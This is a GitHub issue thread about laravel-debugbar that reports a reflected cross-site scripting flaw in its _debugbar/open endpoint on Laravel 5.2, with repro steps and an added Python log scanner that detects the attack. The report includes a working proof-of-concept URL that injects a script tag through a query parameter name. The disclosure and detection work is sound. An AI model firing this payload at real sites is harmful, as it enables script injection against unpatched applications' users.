@barryvdh yes, but the problem is not from debugbar. The Laravel composer.json file must be changed. But the Laravel team doesn't think to change the composer.json file :) details: laravel/framework#24892
This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.
If this issue is still present on the latest version of this library on supported Laravel versions, please let us know by replying to this issue so we can investigate further.
Thank you for your contribution! Apologies for any delayed response on our side.
Security Vulnerability - Cross-site Scripting
Environment
Injection Technical Details
URL: http://{domain}/{laravel_path}/_debugbar/open?op=get&id=om3rcitak&<scRipt>alert(21)<%2fscRipt>=om3rcitak
Parameter Type: Parameter Name (the payload is injected as the name of a query-string parameter, not as its value)
Attack Pattern: <scRipt>alert(21)<%2fscRipt>
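As an added defender-side example (not part of this issue or of the debugbar project), a small Python scanner that walks constructed access-log lines and flags requests to the `_debugbar/open` endpoint whose query-parameter names, after percent-decoding, carry HTML metacharacters, which is the shape of the reflection reported above. The log lines and the `/_debugbar/` path marker are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (combined log format) for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2018:12:00:01 +0000] "GET /_debugbar/open?op=get&id=abc123 HTTP/1.1" 200 512
203.0.113.5 - - [10/Jul/2018:12:00:02 +0000] "GET /_debugbar/open?op=get&id=om3rcitak&%3CscRipt%3Ealert(21)%3C%2FscRipt%3E=om3rcitak HTTP/1.1" 500 2048
198.51.100.9 - - [10/Jul/2018:12:00:03 +0000] "GET /app/_debugbar/open?op=get&id=x&<b>=1 HTTP/1.1" 500 2048
198.51.100.9 - - [10/Jul/2018:12:00:04 +0000] "GET /index.php?page=<script> HTTP/1.1" 200 100
"""

# Pull method and request target out of the quoted request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that matter if a parameter name is echoed unescaped into HTML.
HTML_META = re.compile("[<>\"']")


def suspicious_param_names(target, path_marker="/_debugbar/"):
    """Return query-parameter *names* containing HTML metacharacters for a
    request target under the debugbar path. parse_qsl percent-decodes the
    names, so %3CscRipt%3E and a literal <scRipt> are treated alike."""
    parts = urlsplit(target)
    if path_marker not in parts.path:
        return []
    return [
        name
        for name, _value in parse_qsl(parts.query, keep_blank_values=True)
        if HTML_META.search(name)
    ]


def scan_log(text, path_marker="/_debugbar/"):
    """Scan log lines; return (request_target, flagged_names) for each hit."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.search(line)
        if not match:
            continue
        names = suspicious_param_names(match.group("target"), path_marker)
        if names:
            hits.append((match.group("target"), names))
    return hits


if __name__ == "__main__":
    for target, names in scan_log(SAMPLE_LOG):
        print("flagged:", target, "names:", names)
```

The fourth sample line carries a tag in a parameter value rather than a name, so it is deliberately not flagged; widen `HTML_META` or drop the path check if your own template also reflects values or other routes.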
Repro
$ composer create-project --prefer-dist laravel/laravel:5.2.*
$ cd laravel
$ composer require barryvdh/laravel-debugbar:~2.4
$ php artisan vendor:publish --provider="Barryvdh\Debugbar\ServiceProvider"
$ php artisan serve
and visit: http://{domain}/{laravel_path}/_debugbar/open?op=get&id=om3rcitak&<scRipt>alert(21)<%2fscRipt>=om3rcitak
Notes: I am testing the latest laravel-debugbar version (2.4) for Laravel 5.2.*. This vulnerability does not affect Laravel >= 5.3 or laravel-debugbar >= 3.0 because Laravel uses a different error page template for versions 5.2 and 5.3.